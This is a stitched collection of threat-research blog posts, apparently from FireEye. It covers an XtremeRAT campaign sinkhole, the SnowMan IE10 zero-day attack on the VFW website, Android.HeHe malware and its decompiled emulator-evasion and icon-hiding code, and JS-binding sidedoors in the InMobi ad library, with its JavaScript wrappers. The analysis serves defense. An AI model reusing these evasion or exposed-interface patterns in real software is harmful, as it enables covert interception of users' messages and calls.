41889ca19c18ac59d227590eeb1da214 41889ca19c18ac59d227590eeb1da214 Server Server Uranio4 Uranio4 xjUfrQHP6Xy xjUfrQHP6Xy
90e11bdbc380c88244bb0152f1142aff 90e11bdbc380c88244bb0152f1142aff Server Server Uranio4 Uranio4 xjUfrQHP6Xy xjUfrQHP6Xy
c1ad4445f1064195de1d6756950e2ae9 c1ad4445f1064195de1d6756950e2ae9 Server Server Uranio5 Uranio5 3.6 Private 3.6 Private R9lmAhUK R9lmAhUK
e5b781ec77472d8d4b3b4a4d2faf5761 e5b781ec77472d8d4b3b4a4d2faf5761 Server Server Uranio6 Uranio6 3.6 Private 3.6 Private KdXTsbjJ6 KdXTsbjJ6
a921aa35deedf09fabee767824fd8f7e a921aa35deedf09fabee767824fd8f7e Server Server Uranio6 Uranio6 3.6 Private 3.6 Private KdXTsbjJ6 KdXTsbjJ6
9a2e510de8a515c9b73efdf3b141f6c2 9a2e510de8a515c9b73efdf3b141f6c2 CC CC Uranio7 Uranio7 3.6 Private 3.6 Private UBt3eQq0 UBt3eQq0
a6b862f636f625af2abcf5d2edb8aca2 a6b862f636f625af2abcf5d2edb8aca2 CC CC Uranio7 Uranio7 3.6 Private 3.6 Private iodjmGyP3 iodjmGyP3
0327859be30fe6a559f28af0f4f603fe 0327859be30fe6a559f28af0f4f603fe CC CC Uranio7 Uranio7 3.6 Private 3.6 Private UBt3eQq0 UBt3eQq0

“Server”, “Servers”, and “--((Mutex))--” are the defaults in the XtremeRAT controller for ID, Group, and Mutex respectively. The random mutex names in the table above can be generated by double-clicking in the Mutex field within the controller. In most cases, the number at the end of the group label is the same number used at the end of the subdomain for the CnC. In the case of “Uranio2011”, the subdomain is simply “uranio” and 2011 represents the port number used to communicate with the CnC infrastructure.

[caption id="attachment_4478" align="alignnone" width="900"]Figure 8. Portugese version of XtremeRAT controller Figure 8. Portugese version of XtremeRAT controller[/caption]

Uranio Sinkhole Analysis

We sinkholed between November 22, 2013 and January 6, 2014. During that time, 12000 unique IPs connected to the Recall, that this number reflects only one of many command and control servers. [8]

However, estimating the number of victims this way is difficult due to DHCP lease times, which inflate the numbers, and NAT connections, which deflate the numbers. [9] As such, we counted the unique IP addresses that connected to the sinkhole on each day. The highest number of connections to this sinkhole was on Dec. 3, 2013 with 2003 connections and the lowest was Jan. 6, 2014 with 109 connections. The average number of unique IP addresses that connected to the sinkhole per day was 657.

While these IP addresses were in ranges assigned to 40 distinct countries, the vast majority of the connections to the sinkhole (92.7 percent) were from Colombia. Argentina was a distant second with 1.22 percent, followed by Venezuela with 1.02 percent, Egypt with 0.95 percent and the U.S. with 0.9 percent.


Determining the activity of targeted threat actors is difficult. Most of the activity associated with publicly available RATs is traditional cybercrime associated with spam runs, banking Trojans and malware distribution. However, useful indicators can be extracted from these ubiquitous RATs to track the activities of targeted threat actors (as well as cybercrime).




2. The group behind the Carberp banking Trojan were arrested, the author of Zeus retired,, the author of SpyEye went into hiding and was recently arrested, FBI and Microsoft have gone after Citadel which is not off the market and an overview of the “Big 4” banking Trojans

3. /content/dam/legacy/resources/pdfs/fireeye-poison-ivy-report.pdf





8. We filtered out all non-XtremeRAT traffic and ensured that each of the 12000 IPs attempted to make an XtremeRAT connection.


Operation SnowMan: DeputyDog Actor Compromises US Veterans of Foreign Wars Website

On February 11, FireEye identified a zero-day exploit (CVE-2014-0322)  being served up from the U.S. Veterans of Foreign Wars’ website (vfw[.]org). We believe the attack is a strategic Web compromise targeting American military personnel amid a paralyzing snowstorm at the U.S. Capitol in the days leading up to the Presidents Day holiday weekend. Based on infrastructure overlaps and tradecraft similarities, we believe the actors behind this campaign are associated with two previously identified campaigns (Operation DeputyDog and Operation Ephemeral Hydra).

This blog post examines the vulnerability and associated attacks, which we have dubbed “Operation SnowMan."

Exploit/Delivery analysis

After compromising the VFW website, the attackers added an iframe into the beginning of the website’s HTML code that loads the attacker’s page in the background. The attacker’s HTML/JavaScript page runs a Flash object, which orchestrates the remainder of the exploit. The exploit includes calling back to the IE 10 vulnerability trigger, which is embedded in the JavaScript.  Specifically, visitors to the VFW website were silently redirected through an iframe to the exploit at www.[REDACTED].com/Data/img/img.html.


The exploit targets IE 10 with Adobe Flash. It aborts exploitation if the user is browsing with a different version of IE or has installed Microsoft’s Experience Mitigation Toolkit (EMET). So installing EMET or updating to IE 11 prevents this exploit from functioning.

Vulnerability analysis

The vulnerability is a previously unknown use-after-free bug in Microsoft Internet Explorer 10. The vulnerability allows the attacker to modify one byte of memory at an arbitrary address. The attacker uses the vulnerability to do the following:

  • Gain access to memory from Flash ActionScript, bypassing address space layout randomization (ASLR)
  • Pivot to a return-oriented programing (ROP) exploit technique to bypass data execution prevention (DEP)

EMET detection

The attacker uses the Microsoft.XMLDOM ActiveX control to load a one-line XML string containing a file path to the EMET DLL. Then the exploit code parses the error resulting from the XML load order to determine whether the load failed because the EMET DLL is not present.  The exploit proceeds only if this check determines that the EMET DLL is not present.

ASLR bypass

Because the vulnerability allows attackers to modify memory to an arbitrary address, the attacker can use it to bypass ASLR. For example, the attacker corrupts a Flash Vector object and then accesses the corrupted object from within Flash to access memory. We have discussed this technique and other ASLR bypass approaches in our blog. One minor difference between the previous approaches and this attack is the heap spray address, which was changed to 0x1a1b2000 in this exploit.

Code execution

Once the attacker’s code has full memory access through the corrupted Flash Vector object, the code searches through loaded libraries gadgets by machine code. The attacker then overwrites the vftable pointer of a flash.Media.Sound() object in memory to point to the pivot and begin ROP. After successful exploitation, the code repairs the corrupted Flash Vector and flash.Media.Sound to continue execution.

Shellcode analysis

Subsequently, the malicious Flash code downloads a file containing the dropped malware payload. The beginning of the file is a JPG image; the end of the file (offset 36321) is the payload, encoded with an XOR key of 0x95. The attacker appends the payload to the shellcode before pivoting to code control. Then, when the shellcode is executed, the malware creates files “sqlrenew.txt” and “stream.exe”. The tail of the image file is decoded, and written to these files. “sqlrenew.txt” is then executed with the LoadLibraryA Windows API call.

ZxShell payload analysis

As documented above, this exploit dropped an XOR (0x95) payload that executed a ZxShell backdoor (MD5: 8455bbb9a210ce603a1b646b0d951bce). The compile date of the payload was 2014-02-11, and the last modified date of the exploit code was also 2014-02-11. This suggests that this instantiation of the exploit was very recent and was deployed for this specific strategic Web compromise of the Veterans of Foreign Wars website. A possible objective in the SnowMan attack is targeting military service members to steal military intelligence. In addition to retirees, active military personnel use the VFW website. It is probably no coincidence that Monday, Feb. 17, is a U.S. holiday, and much of the U.S. Capitol shut down Thursday amid a severe winter storm.

The ZxShell backdoor is a widely used and publicly available tool used by multiple threat actors linked to cyber espionage operations. This particular variant called back to a command and control server located at newss[.]effers[.]com. This domain currently resolves to The domain info[.]flnet[.]org also resolved to this IP address on 2014-02-12.

Infrastructure analysis

The info[.]flnet[.]org domain overlaps with icybin[.]flnet[.]org and book[.]flnet[.]org via the previous resolutions to the following IP addresses:

First Seen Last Seen CnC Domain IP
2013-08-31 2013-08-31 2013-08-31 2013-08-31 icybin.flnet[.]org icybin.flnet[.]org
2013-05-02 2013-05-02 2013-08-02 2013-08-02 info.flnet[.]org info.flnet[.]org
2013-08-02 2013-08-02 2013-08-02 2013-08-02 book.flnet[.]org book.flnet[.]org
2013-08-10 2013-08-10 2013-08-10 2013-08-10 info.flnet[.]org info.flnet[.]org
2013-07-15 2013-07-15 2013-07-15 2013-07-15 icybin.flnet[.]org icybin.flnet[.]org
2014-01-02 2014-01-02 2014-01-02 2014-01-02 book.flnet[.]org book.flnet[.]org
2013-12-03 2013-12-03 2014-01-02 2014-01-02 info.flnet[.]org info.flnet[.]org

We previously observed Gh0stRat samples with the custom packet flag “HTTPS” calling back to book[.]flnet[.]org and icybin[.]flnet[.]org. The threat actor responsible for Operation DeputyDog also used the “HTTPS” version of the Gh0st. We also observed another “HTTPS” Gh0st variant connecting to a related command and control server at me[.]scieron[.]com.

MD5 Hash CnC Domain
758886e58f9ea2ff22b57cbbb015166e 758886e58f9ea2ff22b57cbbb015166e book.flnet[.]org book.flnet[.]org
0294f9280491f85d898ebe471f0fb58e 0294f9280491f85d898ebe471f0fb58e icybin.flnet[.]org icybin.flnet[.]org
9d20566a327076b7152bbf9ed20292c4 9d20566a327076b7152bbf9ed20292c4 me.scieron[.]com me.scieron[.]com

The me[.]scieron[.]com domain previously resolved to The book[.]flnet[.]org domain also resolved to another IP in the same subnet Specifically, book[.]flnet[.]org previously resolved to

Others domain seen resolving to this same /24 subnet were dll[.]freshdns[.]org, ali[.]blankchair[.]com, and cht[.]blankchair[.]com. The domain dll[.]freshdns[.]org resolved to Both ali[.]blankchair[.]com and cht[.]blankchair[.]com resolved to

First Seen Last Seen CnC Domain IP
2012-11-12 2012-11-12 2012-11-28 2012-11-28 me.scieron[.]com me.scieron[.]com
2012-04-09 2012-04-09 2012-10-24 2012-10-24 cht.blankchair[.]com cht.blankchair[.]com
2012-04-09 2012-04-09 2012-09-18 2012-09-18 ali.blankchair[.]com ali.blankchair[.]com
2012-11-08 2012-11-08 2012-11-25 2012-11-25 dll.freshdns[.]org dll.freshdns[.]org
2012-11-23 2012-11-23 2012-11-27 2012-11-27 rt.blankchair[.]com rt.blankchair[.]com
2012-05-29 2012-05-29 2012-6-28 2012-6-28 book.flnet[.]org book.flnet[.]org

A number of other related domains resolve to these IPs and other IPs also in this /24 subnet. For the purposes of this blog, we’ve chosen to focus on those domains and IP that relate to the previously discussed DeputyDog and Ephemeral Hydra campaigns.

You may recall that dll[.]freshdns[.]org, ali[.]blankchair[.]com and cht[.]blankchair[.]com were all linked to both Operation DeputyDog and Operation Ephemeral Hydra. Figure 1 illustrates the infrastructure overlaps and connections we observed between the strategic Web compromise campaign leveraging the VFW’s website, the DeputyDog, and the Ephemeral Hydra operations.

Figure 1: Ties between Operation SnowMan, DeputyDog, and Ephemeral Hydra

Links to DeputyDog and Ephemeral Hydra

Other tradecraft similarities between the actor(s) responsible for this campaign and the actor(s) responsible for the DeputyDog/Ephemeral Hydra campaigns include:

  • The use of zero-day exploits to deliver a remote access Trojan (RAT)
  • The use of strategic web compromise as a vector to distribute remote access Trojans
  • The use of a simple single-byte XOR encoded (0x95) payload obfuscated with a .jpg extension
  • The use of Gh0stRat with the “HTTPS” packet flag
  • The use of related command-and-control (CnC) infrastructure during the similar time frames

We observed many similarities from the exploitation side as well. At a high level, this attack and the CVE-2013-3163 attack both leveraged a Flash file that orchestrated the exploit, and would call back into IE JavaScript to trigger an IE flaw. The code within the Flash files from each attack are extremely similar. They build ROP chains and shellcode the same way, both choose to corrupt a Flash Vector object, have some identical functions with common typos, and even share the same name.


These actors have previously targeted a number of different industries, including:

  • U.S. government entities
  • Japanese firms
  • Defense industrial base (DIB) companies
  • Law firms
  • Information technology (IT) companies
  • Mining companies
  • Non-governmental organizations (NGOs)

The proven ability to successfully deploy a number of different private and public RATs using zero-day exploits against high-profile targets likely indicates that this actor(s) will continue to operate in the mid to long-term.

Android.HeHe: Malware Now Disconnects Phone Calls

FireEye Labs has recently discovered six variants of a new Android threat that steals text messages and intercepts phone calls. We named this sample set “Android.HeHe” after the name of the activity that is used consistently across all samples.

Here is a list of known bot variants:

MD5 VirusTotal Detection Ratio
1caa31272daabb43180e079bca5e23c1 1caa31272daabb43180e079bca5e23c1 2/48 2/48
8265041aca378d37006799975fa471d9 8265041aca378d37006799975fa471d9 1/47 1/47
2af4de1df7587fa0035dcefededaedae 2af4de1df7587fa0035dcefededaedae 2/45 2/45
2b41fbfb5087f521be193d8c1f5efb4c 2b41fbfb5087f521be193d8c1f5efb4c 2/46 2/46
aa0ed04426562df25916ff70258daf6c aa0ed04426562df25916ff70258daf6c 1/46 1/46
9507f93d9a64d718682c0871bf354e6f 9507f93d9a64d718682c0871bf354e6f 1/47 1/47


The app disguises itself as “android security” (Figure 1), attempting to provide the users what is advertised as an OS Update. It contacts the command-and-control (CnC) server to register itself then goes on to monitor incoming SMS messages. The CnC is expected to respond with a list of phone numbers that are of interest to the malware author. If one of these numbers sends an SMS or makes a call to an infected device, the malware intercepts the message or call, suppresses device notifications from the device, and removes any trace of the message or call from device logs. Any SMS messages from one of these numbers are logged into an internal database and sent to the CnC server. Any phone calls from these numbers are silenced and rejected.

[caption id="attachment_4369" align="aligncenter" width="302"]App installs itself Figure 1[/caption]


This app starts the main HeHe activity at startup. The constructor of the HeHeActivity registers a handler using the android.os.Handle, which acts as a thread waiting for an object of type android.os.Message to perform different actions, which are outlined below.

Because the HeHeActivity implements the standard DailogInterfaceOnClickListener, the start of the app causes the showAlterDailog message to be displayed (Figure 2).

[caption id="attachment_4373" align="aligncenter" width="404"]Fake OS Update in progress Figure 2: The above messages make the user believe that an OS update check is under progress[/caption]

The app then sends an intent to start three services in the background. These services are explained below.

Sandbox-evasion tactic

This app checks for the presence of an emulator by calling the isEmulator function, which does the following:

  1. It checks the value of the MODEL of the device (emulators with the Google ADT bundle have the string “sdk” as a part of the MODEL variable).
  2. It also checks to see if the IMSI code is “null” — emulators do not have an IMSI code associated with them.

Here is the isEmulator code:

String v0 = TelephonyUtils.getImsi(((Context)this));
if(v0 == null) {
public static boolean isEmulator() {
boolean v0;
if((Build.MODEL.equalsIgnoreCase("sdk")) || (Build.MODEL.equalsIgnoreCase("google_sdk"))) {
v0 = true;
else {
v0 = false;
return v0;

The code checks whether the the app is being run in the Android QEMU emulator. It also checks whether the value of IMSI is equal to null


This service runs in the background. Once started the app calls the setComponentEnabledSetting method as follows:

this.getPackageManager().setComponentEnabledSetting(new ComponentName(((Context)this), HeheActivity.class), 2, 1);

This removes the app from the main menu of the phone leading the user to believe that the app is no longer installed on the phone. It then goes on to check the network status of the phone as shown below

public void checkNetwork() { 
if(!this.isNetworkAvailable()) {

After the service has been created. The onStart method is called, which checks the message provided as a part of the intent. The message types are START and LOGIN


If the message in the intent is START, The app calls the sendReigsterRequest() function. The sendRegisterRequest function first checks for the presence of an emulator as explained in the "Sandbox-evasion tactic" section

It then collects the IMSI IMEI, phone number, SMS address and channel ID. It packs all this information into a JSON object. Once the JSON object is created. It is converted to a string, which is sent to the CnC server. The CnC communication is explained below.


If the message in the intent is LOGIN, the app calls the sendLoginRequest method, which in turn collects the following:

  • Version number of the app (hard-coded as "1.0.0")
  • The model of the phone
  • The version of the operating system
  • The type of network associated with the device (GSM/CDMA)

This information is also packed into a JSON object, converted into a string, and sent to the CnC server.

RegisterBroadcastReceiver service

This service is invoked at the start of the app as the RegisterService. It in turn registers the IncomeCallAndSmsReceiver(), which is set to respond to these three intents:

  • android.provider.Telephony.SMS_RECEIVED, which notifies once a SMS has been received on the device
  • android.intent.action.PHONE_STATE, which notifies once the cellular state of the device has changed. Examples include RINGING and OFF_HOOK.
  • android.intent.action.SCREEN_ON, which notifies once the screen has been turned on or turned off.

Additionally, it also sets observers over Android content URIs as follows:

  • The SmsObserver is set to observe the content://sms, which enables it to access all SMS messages that are present on the device.
  • The CallObserver is set to observe the content://call_log/calls, which allows it to access the call log of all incoming, outgoing and missed calls on the device.


The main HeHe activity mentioned at the start issues the ACTION_START intent to the ConnectionService class as follows:

Intent v2 = new Intent(((Context)this), ConnectionService.class);


v2.setFlags(268435456); this.startService(v2); LogUtils.debug("heheActivity", "start connectionService service"); The app then starts a timer task that is scheduled to be invoked every 5000 seconds. This timed task does the following:
  • Creates an object instance of the android.os.Message class
  • Sets the value of "what" in the Message object to 1
  • The handler of this message that was initiated in the constructor then gets called which, in turn calls the showFinishBar function that displays the message “현재 OS에서 최신 소프트웨어버전을 사용하고있습니다,” which translates to “The current OS you are using the latest version of the software.”



The RegisterBroadcastReceiver registers this receiver once the app gets started. When an SMS is received on the device. The IncomeCallAndSmsReceiver gets the intent. Because this receiver listens for one of three intents, any intents received by this receiver are checked for their type.

If the received intent is of type android.provider.telephony.SMS_RECEIVED, the app extracts the contents of the SMS and the phone number of the sender. If the first three characters of the phone number matches the first three characters from phone numbers in a table named tbl_intercept_info, then the SMS intent is aborted and the SMS is deleted from the devices SMS inbox so that the user never sees it. After the SMS notification is suppressed, the app bundles the SMS as follows:

"createTime":"2014-01-10 16:21:36",

From there, it sends the to the CnC server (

It also records the SMS in the tbl_message_info table in its internal database.

If the received intent is of type android.intent.action.PHONE_STATE, the app checks the tbl_intercept_info table in the local database. If the number of the caller appears in this table, then the ringer mode of the phone is set to silent to suppress the notification of the incoming call and the phone call is disconnected. Its corresponding entry from the call logs is also removed, removing all traces of the phone call from the device.

No actions have been defined for the intent, even though the IncomeCallAndSmsReceiver receiver is the recipient.


This app uses two hard-coded IP address to locate its CnC servers: and The app performs all communications through HTTP POST requests. The contents of the HTTP POST are encrypted using AES with a 128-bit key that is hardcoded into the app. The app sends its lastVersion value —to, to address is where is used to check for , in which the app sends its version of the app. The address is used to report incoming SMS messages

Because the IP address is no longer reachable, responses from the server could not be analyzed. What is clear is that the server sends a JSON object in response, which contains a "token" field.

Although the CnC server is currently unavailable, we can infer how the app works by examining the how it processes the received responses.

The app consists of different data structures that are converted into their equivalent JSON representations when they are sent to the CnC. Also, All JSON object responses are converted into their equivalent internal data structures. We have also observed the mechanism used to populate the internal database which includes tables (tbl_intercept_info) which contain the phone numbers to be blocked.

The app uses hxxp:// and hxxp:// to send information to the CnC server.

The mapping of URLs to their internal class data structures is as follows:

GetLastVersionRequest /getLastVersion
RegisterRequest /register
LoginRequest /login
ReportRequest /report
GetTaskRequest /getTask
ReportMessage Request /reportMessage

The meaning and structures of these are explained in the following sections.


This request is sent when the app is first installed on the device. The bot sends the version code of the device (currently set to 1.0.0) to the CnC. The CnC response shall contain the URL to an update if available. The availability of an update is signified through an ‘update’ field in the response

[caption id="attachment_4377" align="alignnone" width="816"]Request to CnC to check for version Request to CnC to check for version[/caption]


This request is sent when the app sends an intent with a “LOGIN” option to the RegisterService as explained  above. The request contains the IMSI, IMEI, Phone number, SMS address (Phone number), Channel ID, a token and the IP address being used by the app as its CnC. This causes the infected device to be registered with the CnC.


This request is sent to further authenticate the device to the CnC, It contains the token previously received, the version of the Bot, the model of the phone, the version of the OS, the type of network and the other active network parameters such as signal strength. In response, It only gets a result value.


The report request sends the information present in tbl_report_info to the CnC. This table contains information about other requests that were sent but failed.


This requests asks for tasks from the CnC server. The response contains a retry interval and a sendSmsActionNotify value. It is sent when the response to the LoginRequest is 401 instead of 200.


This request to the CnC sends the contents of the SMS messages that are received on the device. It consists of the contents of the SMS message, the time of the message and the sender of the SMS. This has been observed in the logcat output as follows:



Android malware variants are mushrooming. Threats such as Android.HeHe and Android.MisoSMS reveal attackers' growing interest in monitoring SMS messages and phone call logs. They also serve as a stark reminder of just how dangerous apps from non-trusted marketplaces can be.

JS-Binding-Over-HTTP Vulnerability and JavaScript Sidedoor: Security Risks Affecting Billions of Android App Downloads

Third-party libraries, especially ad libraries, are widely used in Android apps. Unfortunately, many of them have security and privacy issues. In this blog, we summarize our findings related to the insecure usage of JavaScript binding in ad libraries.

First, we describe a widespread security issue with using JavaScript binding (addJavascriptInterface) and loading WebView content over HTTP, which allows a network attacker to take control of the application by hijacking the HTTP traffic. We call this the JavaScript-Binding-Over-HTTP (JS-Binding-Over-HTTP) vulnerability. Our analysis shows that, currently, at least 47 percent of the top 40 ad libraries have this vulnerability in at least one of their versions that are in active use by popular apps on Google Play.

Second, we describe a new security issue with the JavaScript binding annotation, which we call JavaScript Sidedoor. Starting with Android 4.2, Google introduced the @JavascriptInterface annotation to explicitly designate and limit which public methods in Java objects are accessible from JavaScript. If an ad library uses @JavascriptInterface annotation to expose security-sensitive interfaces, and uses HTTP to load content in the WebView, then an attacker over the network could inject malicious content into the WebView to misuse the exposed interfaces through the JS binding annotation. We call these exposed JS binding annotation interfaces JS sidedoors.

Our analysis shows that these security issues are widespread, have affected popular apps on Google Play accounting for literally billions of app downloads. The parties we notified about these issues have been actively addressing them.

Security Issues with JavaScript Binding over HTTP

Android uses the JavaScript binding method addJavascriptInterface to enable JavaScript code running inside a WebView to access the app’s Java methods. However, it is widely known that this feature, if not used carefully, presents a potential security risk when running on Android 4.1 or below. As noted by Google: “Use of this method in a WebView containing untrusted content could allow an attacker to manipulate the host application in unintended ways, executing Java code with the permissions of the host application.” [1]

In particular, if an app running on Android 4.1 or below uses the JavaScript binding method addJavascriptInterface and loads the content in the WebView over HTTP, then an attacker over the network could hijack the HTTP traffic, e.g., through WiFi or DNS hijacking, to inject malicious content into the WebView – and thus take control over the host application. We call this the JavaScript-Binding-Over-HTTP (JS-Binding-Over-HTTP) vulnerability. If an app containing such vulnerability has sensitive Android permissions such as access to the camera, then a remote attacker could exploit this vulnerability to perform sensitive tasks such as taking photos or record video in this case, over the Internet, without a user’s consent.

We have analyzed the top 40 third-party ad libraries (not including Google Ads) used by Android apps. Among the apps with over 100,000 downloads each on Google Play, over 42 percent of the free apps currently contain at least one of these top ad libraries. The total download count of such apps now exceeds 12.4 billion. From our analysis, at least 47 percent of these top 40 ad libraries have at least one version of their code in active use by popular apps on Google Play, and contain the JS-Binding-Over-HTTP vulnerability. As an example, InMobi versions 2.5.0 and above use the JavaScript binding method addJavascriptInterface and load content in the WebView using HTTP.

Security Issues with JavaScript Binding Annotation

Starting with Android 4.2, Google introduced the @JavascriptInterface annotation to explicitly designate and limit which public Java methods in the app are accessible from JavaScript running inside a WebView. However, note that the @JavascriptInterface annotation does not provide any protection for devices using Android 4.1 or below, which is still running on more than 80 percent of Android devices worldwide.

We discovered a new class of security issues, which we call JavaScript Sidedoor (JS sidedoor), in ad libraries. If an ad library uses the @JavascriptInterface annotation to expose security-sensitive interfaces, and uses HTTP to load content in the WebView, then it is vulnerable to attacks where an attacker over the network (e.g., via WIFI or DNS hijacking) could inject malicious content into the WebView to misuse the interfaces exposed through the JS binding annotation. We call these exposed JS binding annotation interfaces JS sidedoors.

For example, starting with version 3.6.2, InMobi added the @JavascriptInterface JS binding annotation. The list of exposed methods through the JS binding annotation in InMobi includes:

  • createCalendarEvent (version 3.7.0 and above)
  • makeCall (version 3.6.2 and above)
  • postToSocial (version 3.7.0 and above)
  • sendMail (version 3.6.2 and above)
  • sendSMS (version 3.6.2 and above)
  • takeCameraPicture (version 3.7.0 and above)
  • getGalleryImage (version 3.7.0 and above)
  • registerMicListener (version 3.7.0 and above)

InMobi also provides JavaScript wrappers to these methods in the JavaScript code served from their ad servers, as shown in Appendix A.

InMobi also loads content in the WebView using HTTP. If an app has the Android permission CALL_PHONE, and is using InMobi versions 3.6.2 to 4.0.2, an attacker over the network (for example, using Wi-Fi or DNS hijacking) could abuse the makeCall annotation in the app to make phone calls on the device without a user’s consent – including to premium numbers.

In addition, without requiring special Android permissions in the host app, attackers over the network, via HTTP or DNS hijacking, could also misuse the aforementioned exposed methods to misguide the user to post to the user’s social network from the device (postToSocial in version 3.7.0 and above), send email to any designated recipient with a pre-crafted title and email body (sendMail in version 3.6.2 and above), send SMS to premium numbers (sendSMS in version 3.6.2 and above), create calendar events on the device (createCalendarEvent in version 3.7.0 and above), and to take pictures and access the photo gallery on the device (takeCameraPicture and getGalleryImage in version 3.7.0 and above). To complete these actions, the user would need to click on certain consent buttons. However, as generally known, users are quite vulnerable to social engineering attacks through which attackers could trick users to give consent.

We have identified more than 3,000 apps on Google Play that contain versions 2.5.0 to 4.0.2 of InMobi – and which have over 100,000 downloads each as of December, 2013. Currently, the total download count for these affected apps is greater than 3.7 billion.

We have informed both Google and InMobi of our findings, and they have been actively working to address them.

New InMobi Update after FireEye Notification

After we notified the InMobi vendor about these security issues, they promptly released new SDK versions 4.0.3 and 4.0.4. The 4.0.3 SDK, marked as “Internal release”, was superseded by 4.0.4 after one day. The 4.0.4 SDK made the following changes:

  1. Changed its method exposed through annotation for making phone calls (makeCall) to require user’s consent.
  2. Added a new storePicture interface to download and save specified files from the Internet to the user’s Downloads folder. Despite the name, it can be used for any file, not just images.
  3. Compared with InMobi’s earlier versions, we consider change No. 1 as an improvement that addresses the aforementioned issue of an attacker making phone calls without a user’s consent. We are glad to see that InMobi made this change after our notification.

    InMobi recently released a new SDK version 4.1.0. Compared with SDK version 4.0.4, we haven't seen any changes to JS Binding usage from a security perspective in this new SDK version 4.1.0.

    Moving Forward: Improving Security for JS Binding in Third-party Libraries

    In summary, the insecure usage of JS Binding and JS Binding annotations in third-party libraries exposes many apps that contain these libraries to security risks.

    App developers and third-party library vendors often focus on new features and rich functionalities. However, this needs to be balanced with a consideration for security and privacy risks. We propose the following to the mobile application development and library vendor community:

    1. Third-party library vendors need to explicitly disclose security-sensitive features in their privacy policies and/or their app developer SDK guides.
    2. Third-party library vendors need to educate the app developers with information, knowledge, and best practices regarding security and privacy when leveraging their SDK.
    3. App developers need to use caution when leveraging third-party libraries, apply best practices on security and privacy, and in particular, avoid misusing vulnerable APIs or packages.
    4. When third-party libraries use JS Binding, we recommend using HTTPS for loading content.
    5. Since customers may have different requirements regarding security and privacy, apps with JS-Binding-Over-HTTP vulnerabilities and JS sidedoors can introduce risks to security-sensitive environments such as enterprise networks. FireEye Mobile Threat Prevention provides protection to our customers from these kinds of security threats.


      We thank our team members Adrian Mettler and Zheng Bu for their help in writing this blog.

      Appendix A: JavaScript Code Snippets Served from InMobi Ad Servers

      a.takeCameraPicture = function () {



      a.getGalleryImage = function () {



      a.makeCall = function (f) {

      try {


      } catch (d) {

      a.showAlert("makeCall: " + d)



      a.sendMail = function (f, d, b) {

      try {

      utilityController.sendMail(f, d, b)

      } catch (c) {

      a.showAlert("sendMail: " + c)



      a.sendSMS = function (f, d) {

      try {

      utilityController.sendSMS(f, d)

      } catch (b) {

      a.showAlert("sendSMS: " + b)



      a.postToSocial = function (a, c, b, e) {

      a = parseInt(a);

      isNaN(a) && window.mraid.broadcastEvent("error", "socialType must be an integer", "postToSocial");

      "string" != typeof c && (c = "");

      "string" != typeof b && (b = "");

      "string" != typeof e && (e = "");

      utilityController.postToSocial(a, c, b, e)


      a.createCalendarEvent = function (a) {

      "object" != typeof a && window.mraid.broadcastEvent("error",

      "createCalendarEvent method expects parameter", "createCalendarEvent");

      "string" != typeof a.start || "string" != typeof a.end ?


      "createCalendarEvent method expects string parameters for start and end dates",

      "createCalendarEvent") :

      ("string" != typeof a.location && (a.location = ""),

      "string" != typeof a.description && (a.description = ""),

      utilityController.createCalendarEvent(a.start, a.end, a.location, a.description))


      a.registerMicListener=function() {



      Trends in Targeted Attacks: 2013

      FireEye has been busy over the last year. We have tracked malware-based espionage campaigns and published research papers on numerous advanced threat actors. We chopped through Poison Ivy, documented a cyber arms dealer, and revealed that Operation Ke3chang had targeted Ministries of Foreign Affairs in Europe.

      Worldwide, security experts made many breakthroughs in cyber defense research in 2013. I believe the two biggest stories were Mandiant’s APT1 report and the ongoing Edward Snowden revelations, including the revelation that the U.S. National Security Agency (NSA) compromised 50,000 computers around the world as part of a global espionage campaign.

      In this post, I would like to highlight some of the outstanding research from 2013.

      Trends in Targeting

      Targeted malware attack reports tend to focus on intellectual property theft within specific industry verticals. But this year, there were many attacks that appeared to be related to nation-state disputes, including diplomatic espionage and military conflicts.


      Where kinetic conflict and nation-state disputes arise, malware is sure to be found. Here are some of the more interesting cases documented this year:

      • Middle East: continued attacks targeting the Syrian opposition; further activity by Operation Molerats related to Israel and Palestinian territories.
      • India and Pakistan: tenuous relations in physical world equate to tenuous relations in cyberspace. Exemplifying this trend was the Indian malware group Hangover, the ByeBye attacks against Pakistan, and Pakistan-based attacks against India.
      • Korean peninsula: perhaps foreshadowing future conflict, North Korea was likely behind the Operation Troy (also known as DarkSeoul) attacks on South Korea that included defacements, distributed denial-of-service (DDoS) attacks, and malware that wiped hard disks. Another campaign, Kimsuky, may also have a North Korean connection.
      • China: this was the source of numerous attacks, including the ongoing Surtr campaign, against the Tibetan and Uygur communities, which targeted MacOS and Android.


      Malware continues to play a key role in espionage in the Internet era. Here are some examples that stood out this year:

      • The Snowden documents revealed that NSA and GCHQ deployed key logging malware during the G20 meeting in 2009.
      • In fact, G20 meetings have long been targets for foreign intelligence services, including this year’s G20 meeting in Russia.
      • The Asia-Pacific Economic Cooperation (APEC) and The Association of Southeast Asian Nations (ASEAN) are also frequent targets.
      • FireEye announced that Operation Ke3chang compromised at least five Ministries of Foreign Affairs in Europe.
      • Red October, EvilGrab, and Nettraveler (aka RedStar) targeted both diplomatic missions and commercial industries.

      Technical Trends

      Estimations of “sophistication” often dominate the coverage of targeted malware attacks. But what I find interesting is that simple changes made to existing malware are often more than enough to evade detection. Even more surprising is that technically “unsophisticated” malware is often found in the payload of “sophisticated” zero-day exploits. And this year quite a number of zero-days were used in targeted attacks.


      Quite a few zero-day exploits appeared in the wild this year, including eleven discovered by FireEye. These exploits included techniques to bypass ASLR and application sandboxes. The exploits that I consider the most significant are the following:


      The malware samples used by several advanced persistent threat (APT) actors were slightly modified this year, possibly as an evasive response to increased scrutiny, in order to avoid detection. For example, there were changes to Aumlib and Ixeshe, which are malware families associated with APT12, the group behind attacks on the New York Times. When APT1 (aka Comment Crew) returned after their activities were exposed, they also used modified malware. In addition, Terminator (aka FakeM), and Sykipot were modified.

      Threat Actors

      Attribution is a tough problem, and the term itself has multiple meanings. Some use it to refer to an ultimate benefactor, such as a nation-state. Others use the term to refer to malware authors, or command-and-control (CnC) operators. This year, I was fascinated by published research about exploit and malware dealers and targeted attack contractors (also known as cyber “hitmen”), because it further complicates the traditional “state-sponsored” analysis that we’ve become accustomed to.

      • Dealers — The malware and exploits used in targeted attacks are not always exclusively available to one threat actor. Some are supplied by commercial entities such as FinFisher, which has been reportedly used against activists around the world, and HackingTeam, which sells spyware to governments and law enforcement agencies. FireEye discovered a likely cyber arms dealer that is connected to no fewer than 11 APT campaigns – however, the relationship between the supplier and those who use the malware remains unclear. Another similar cluster, known as the Maudi Operation, was also documented this year.
